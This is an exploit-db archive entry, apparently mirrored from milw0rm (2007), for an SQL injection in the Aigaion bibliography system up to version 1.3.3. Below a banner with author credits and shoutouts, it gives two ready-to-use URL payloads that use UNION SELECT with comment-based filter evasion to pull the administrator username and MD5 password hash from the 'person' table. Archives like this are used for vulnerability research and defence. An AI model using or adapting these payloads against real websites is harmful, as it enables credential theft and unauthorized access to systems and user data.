exploit-db-mirror/platforms/php/webapps/4164.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

16 lines
900 B
Text
Executable file

--==+================================================================================+==--
--==+ Aigaion <= 1.3.3 SQL Injection Exploit +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--
EXPLOITS:
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--
# milw0rm.com [2007-07-09]